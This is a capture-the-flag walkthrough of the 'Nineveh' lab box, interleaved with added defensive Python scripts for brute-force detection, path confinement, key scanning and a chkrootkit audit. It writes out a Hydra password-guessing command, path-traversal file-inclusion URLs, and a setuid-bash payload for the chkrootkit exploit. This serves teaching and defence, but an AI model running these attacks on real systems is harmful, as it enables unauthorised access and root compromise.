Summary

Nineveh is a medium-difficulty Linux box. Brute-forcing the credentials of the department login form leads to a page that is vulnerable to local file inclusion (LFI). A second brute-force attack yields the phpLiteAdmin password, after which a new database containing PHP code can be created and executed through the LFI. A private key hidden inside one of the images, combined with a port-knock sequence, gives a low-privileged SSH shell. A cron job shows that chkrootkit is in use, and a public exploit for it yields a root shell.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.94.12
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

The user is presented with the following:

Gobuster found the following locations:

http://10.129.94.12/department/login.php
https://10.129.94.36/db
https://10.129.94.36/secure_notes/

The first page was vulnerable to username enumeration:

It also shows this comment in the response:

@admin! MySQL is been installed.. please fix the login page! ~amrois

Since the username is known, the password can be brute-forced. Hydra was used here because it is easy to configure and very fast. The following command was used against the login form:

In only one minute, Hydra found the password:

[80][http-post-form] host: 10.129.94.12 login: admin password: 1q2w3e4r5t

After authenticating, the following page is shown:

This page shows several hints, including a link to the following notes page: http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.txt


Exploitation

This page turned out to be vulnerable to local file inclusion (LFI). The following request was issued:

http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.php../../../../../../../etc/passwd

The passwd file was retrieved:

Next, an attempt was made to read the user flag directly:

http://10.129.94.12/department/manage.php?notes=files/ninevehNotes.php../../../../../../../home/amrois/user.txt

However, this returns an error saying that the file name is too long. Going back to the other directories gobuster found, the following page was discovered:

Authenticating with the previously discovered credentials does not work. Searchsploit lists the following exploits:

However, all of these require authentication. Therefore, hydra was used again with the following command:

hydra -P /usr/share/wordlists/rockyou.txt 10.129.94.12 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password."

Hydra found it again:
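Both Hydra runs in this write-up (against the department login form and against the phpLiteAdmin login) leave the same footprint on the server: a dense burst of POST requests to one login endpoint from a single source. The detector below is an added example, not code from the write-up; it reads Apache combined-format access log lines and flags that pattern. The endpoint paths are the two forms from the write-up, while the log lines, timestamps and IP addresses are constructed for the example.

```python
"""Flag login brute-forcing in Apache access logs.

Added example (not code from the write-up): a detector that reads Apache
combined-format access log lines and reports any source IP that sends an
unusually dense burst of POST requests to a login endpoint. The endpoint
paths are the two login forms from the write-up; the log lines and IPs are
constructed for the example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Login forms seen in the write-up (assumed to be the only login endpoints).
LOGIN_ENDPOINTS = {"/department/login.php", "/db/index.php"}

# Apache combined log format: ip ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]  # drop the query string
    return m.group("ip"), ts, m.group("method"), path, int(m.group("status"))


def detect_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Return {(ip, path): peak_count} for every source that issued at least
    `threshold` POSTs to one login endpoint inside a sliding `window`.

    The HTTP status is deliberately not used: both forms in the write-up
    answer a wrong password with a 200 and an error string, so request
    density, not status codes, is the usable signal.
    """
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, _status = rec
        if method == "POST" and path in LOGIN_ENDPOINTS:
            posts[(ip, path)].append(ts)

    alerts = {}
    for key, stamps in posts.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            hits = end - start + 1
            if hits >= threshold:
                alerts[key] = max(alerts.get(key, 0), hits)
    return alerts


def _log_line(ip, ts, method, path, status=200):
    stamp = ts.strftime("%d/%b/%Y:%H:%M:%S %z")
    return f'{ip} - - [{stamp}] "{method} {path} HTTP/1.1" {status} 1532 "-" "Mozilla/5.0"'


def sample_log():
    """Constructed log: one browsing user plus a 25-request burst in 25 seconds."""
    t0 = datetime(2021, 2, 8, 15, 31, 0, tzinfo=timezone(timedelta(hours=1)))
    lines = [_log_line("10.10.14.9", t0, "GET", "/department/login.php")]
    for i in range(3):  # a human retrying the phpLiteAdmin password a few times
        lines.append(_log_line("10.10.14.9", t0 + timedelta(seconds=20 * i), "POST", "/db/index.php"))
    for i in range(25):  # tool-driven burst against the department login form
        lines.append(_log_line("10.10.14.5", t0 + timedelta(seconds=i), "POST",
                               "/department/login.php?next=manage.php"))
    return lines


if __name__ == "__main__":
    for (ip, path), hits in detect_bruteforce(sample_log()).items():
        print(f"ALERT {ip} -> {path}: {hits} POSTs within 60s")
```

The threshold and window are tuning knobs; a burst of 25 POSTs in 25 seconds is far beyond what a person typing passwords produces, while the three spaced-out retries from the second address stay below the default threshold.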

Let's go back to the following exploit from searchsploit to get RCE as an authenticated user.

A database was created with the name ninevehNotes.txt.rce.php. The first part of that name has to be present in the database name; otherwise the LFI keeps returning the "file name too long" error. Also note that single quotes cannot be used in the PHP code, as they break the SQL statement. In this case, the PHP code fetches a file named shell.txt, which contains a PHP reverse shell.
Then browse to: http://10.129.94.36/department/manage.php?notes=/var/tmp/ninevehNotes.txt.rce.php
This lands you a reverse shell.
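The LFI used in this section works because manage.php includes whatever path the notes parameter names as long as the expected file-name fragment is present, which is what the "file name too long" observations above suggest. The following is an added example, not code from the box or the write-up: weak_check models that assumed substring test, and resolve_note is the hardened replacement that canonicalises the path and confines it to the notes directory. The base directory /srv/department and the note names are assumptions for the illustration.

```python
"""Confine a user-supplied notes path to the notes directory.

Added example (not code from the box or the write-up). `weak_check` models
the assumed substring test that lets traversal through as long as the
expected fragment is present; `resolve_note` is the hardened replacement.
The base directory and the note file names are assumptions.
"""
import os

NOTES_BASE = "/srv/department"          # assumed directory manage.php serves from
ALLOWED_SUFFIXES = (".txt",)            # notes are plain text; never include .php


def weak_check(user_path, marker="ninevehNotes"):
    """Substring test only: any traversal passes as long as the marker is present."""
    return marker in user_path


def resolve_note(user_path, base_dir=NOTES_BASE):
    """Return the canonical path of a note inside base_dir, or None if rejected.

    Rejected: NUL bytes, absolute paths, anything that canonicalises to a
    location outside base_dir, and names without an allowed suffix.
    """
    if "\x00" in user_path or os.path.isabs(user_path):
        return None
    base = os.path.realpath(base_dir)
    # realpath resolves ".." and symlinks, so the check happens on the real target
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath (not startswith) so "/srv/department2/..." cannot masquerade as inside base
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


def classify(user_path):
    """Show both checks side by side for one input."""
    return {"weak_allows": weak_check(user_path), "hardened_path": resolve_note(user_path)}


if __name__ == "__main__":
    for p in ("files/ninevehNotes.txt",
              "files/ninevehNotes.php../../../../../../../etc/passwd",
              "/var/tmp/ninevehNotes.txt.rce.php"):
        print(p, "->", classify(p))
```

Run against the three request paths from this write-up, the substring check accepts all of them while the hardened resolver accepts only the genuine note; the suffix allowlist alone would also have stopped the .php database file from ever being included.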


Privilege Escalation: www-data to amrois

Linpeas found a mail:

www-data@nineveh:/tmp$ cat /var/mail/amrois
From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

The numbers in this message hint at port knocking. Check the configuration with:

www-data@nineveh:/home/amrois$ cat /etc/knockd.conf
[options]
 logfile = /var/log/knockd.log
 interface = ens160

[openSSH]
 sequence = 571, 290, 911 
 seq_timeout = 5
 start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn

[closeSSH]
 sequence = 911,290,571
 seq_timeout = 5
 start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
 tcpflags = syn 

To open port 22, execute the following command:
knock 10.129.94.36 571 290 911
Re-running Nmap shows that the port is now open:

nmap -p22 10.129.94.36
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-08 15:31 CET
Nmap scan report for 10.129.94.36
Host is up (0.011s latency).

PORT   STATE SERVICE
22/tcp open  ssh

However, SSH prompts for a password. It took a while to figure this out, but go back to the directories found by gobuster. The only page that has not been checked so far is:
https://10.129.94.36/secure_notes/
You can locate this directory on the box itself:

www-data@nineveh:/home/amrois$ locate secure_notes
/var/www/ssl/secure_notes
/var/www/ssl/secure_notes/index.html
/var/www/ssl/secure_notes/nineveh.png

Running strings on those files reveals a private key inside the .png file. Copy it to a file on your local machine and authenticate over SSH with:
ssh -i nineveh-privatekey amrois@10.129.94.36
This gives a low-privileged shell from which user.txt can be read.
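A private key hidden inside nineveh.png is exactly what a pre-deployment scan of the web root should catch. As an added example that is not part of the write-up, the scanner below reads every file under a directory as raw bytes and reports PEM private-key blocks regardless of file type or extension. The sample web root it builds lives in a temporary directory and contains a placeholder key body, not a real key; the directory and file names mirror those on the box.

```python
"""Find private-key material embedded in files served from a web root.

Added example (not from the write-up): walks a directory tree, reads each
file as bytes and reports PEM private-key blocks wherever they sit, so a key
appended to an image is found as easily as one in a .pem file. The sample
tree is constructed in a temporary directory with a placeholder key body.
"""
import os
import re
import tempfile

# Matches any PEM private-key block (RSA, EC, OPENSSH, PKCS#8 "PRIVATE KEY", ...)
PEM_KEY_RE = re.compile(
    rb"-----BEGIN (?P<kind>[A-Z ]*PRIVATE KEY)-----.*?-----END (?P=kind)-----",
    re.S,
)


def scan_file(path):
    """Return [(kind, byte_offset), ...] for every key block in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [(m.group("kind").decode(), m.start()) for m in PEM_KEY_RE.finditer(data)]


def scan_tree(root):
    """Scan every regular file under root; results sorted by relative path."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            for kind, offset in scan_file(path):
                findings.append({"file": os.path.relpath(path, root), "kind": kind, "offset": offset})
    return sorted(findings, key=lambda f: f["file"])


def build_sample_webroot():
    """Constructed web root: a harmless index.html and a PNG with a key appended."""
    root = tempfile.mkdtemp(prefix="webroot-")
    notes = os.path.join(root, "secure_notes")
    os.makedirs(notes)
    with open(os.path.join(notes, "index.html"), "wb") as fh:
        fh.write(b"<html><body>nothing to see</body></html>")
    png_header = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64      # 72 bytes of image-like data
    fake_key = (b"-----BEGIN RSA PRIVATE KEY-----\n"
                b"PLACEHOLDER-NOT-A-REAL-KEY\n"
                b"-----END RSA PRIVATE KEY-----\n")
    with open(os.path.join(notes, "nineveh.png"), "wb") as fh:
        fh.write(png_header + fake_key + b"\x00" * 16)
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_webroot()):
        print(f"{finding['file']}: {finding['kind']} at byte offset {finding['offset']}")
```

Because the match is done on bytes rather than decoded text, the scanner is indifferent to the container: the key is reported at byte offset 72, right after the image header, which is the same place strings would have shown it.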


Privilege Escalation: amrois to root

Run linpeas again; it finds the following:

Let's check that file:

amrois@nineveh:~$ strings /usr/sbin/report-reset.sh
#!/bin/bash
rm -rf /report/*.txt

Let’s check that directory:

amrois@nineveh:/report$ ls -la
total 24
drwxr-xr-x  2 amrois amrois 4096 Feb  8 08:41 .
drwxr-xr-x 24 root   root   4096 Jan 29 03:34 ..
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:40 report-21-02-08:08:40.txt
-rw-r--r--  1 amrois amrois 4838 Feb  8 08:41 report-21-02-08:08:41.txt
[...]

Searching for some of the report content reveals a lot of information about chkrootkit. Searchsploit has the following module for it:

Chkrootkit 0.49 - Local Privilege Escalation                | linux/local/33899.txt

You can create a file named update and make sure it is executable. The following contents were used:

#!/bin/bash
cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash

When the cron job runs, it creates the file rootbash, after which you can execute it to get a root shell: /tmp/rootbash -p
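From the defender's side, the condition the searchsploit module above relies on is an executable named update in the directory chkrootkit works from (/tmp in the public exploit; the write-up itself does not name the directory) on a chkrootkit release of 0.49 or earlier (fixed in 0.50, a fact not stated in the write-up). The audit script below is an added example, not from the write-up: it checks both conditions, and the directories it inspects are constructed in temporary locations so the check runs offline.

```python
"""Audit for the chkrootkit local privilege-escalation precondition.

Added example (not from the write-up). It reports (1) a chkrootkit version
of 0.49 or earlier, the range affected by the searchsploit entry cited in the
write-up (fixed in 0.50), and (2) an executable file named `update` in the
directory chkrootkit works from (/tmp in the public exploit; assumed here,
the write-up does not name it). The demo directories are constructed.
"""
import os
import stat
import tempfile


def version_tuple(version):
    return tuple(int(part) for part in version.strip().split("."))


def chkrootkit_affected(version):
    """True for releases up to and including 0.49."""
    return version_tuple(version) <= (0, 49)


def inspect_update_file(work_dir="/tmp"):
    """Describe <work_dir>/update if present, else None. lstat so a symlink is itself reported."""
    path = os.path.join(work_dir, "update")
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return None
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "executable": bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)),
        "symlink": stat.S_ISLNK(st.st_mode),
    }


def audit(version, work_dir="/tmp"):
    """Return a list of findings; an empty list means nothing to report."""
    findings = []
    if chkrootkit_affected(version):
        findings.append(f"chkrootkit {version} is affected; upgrade to 0.50 or later")
    info = inspect_update_file(work_dir)
    if info is not None and (info["executable"] or info["symlink"]):
        findings.append(
            f"{info['path']} exists (owner uid {info['owner_uid']}, "
            f"executable={info['executable']}, symlink={info['symlink']}); "
            "remove it and review the cron job that runs chkrootkit"
        )
    return findings


def build_demo_dirs():
    """Constructed layout: one directory with a planted executable update, one clean."""
    planted = tempfile.mkdtemp(prefix="planted-")
    clean = tempfile.mkdtemp(prefix="clean-")
    path = os.path.join(planted, "update")
    with open(path, "w") as fh:
        fh.write("#!/bin/bash\necho placeholder\n")   # harmless stand-in for the audit
    os.chmod(path, 0o755)
    return planted, clean


if __name__ == "__main__":
    planted, clean = build_demo_dirs()
    for version, directory in (("0.49", planted), ("0.50", planted), ("0.50", clean)):
        print(version, directory, audit(version, directory) or ["no findings"])
```

Run from a cron job of its own, or as part of a host baseline, the second check also doubles as an indicator of compromise: a non-root-owned executable named update appearing in that directory on a box that runs chkrootkit as root is worth an incident ticket regardless of the installed version.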


Conclusion

This was a really fun box. Obtaining the private key was rather tricky, but apart from that it was relatively straightforward, and I learned a lot from doing it. Hope you enjoyed this walkthrough!